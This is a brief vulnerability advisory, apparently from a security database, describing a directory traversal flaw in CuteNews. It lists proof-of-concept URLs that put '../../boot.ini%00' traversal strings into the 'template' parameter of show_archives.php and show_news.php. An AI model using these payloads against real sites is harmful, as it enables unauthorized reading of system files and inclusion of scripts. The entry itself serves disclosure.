|
CutePHP CuteNews Directory Traversal Vulnerability
An exploit is not required. The following proof of concept examples are available: http://www.example.com/cute141/show_archives.php?template=../../../../../../../../boot.ini%00 http://www.example.com/cute141/show_archives.php?template=../../../../../../../../[script] http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00 http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script] |
|
|
Privacy Statement |
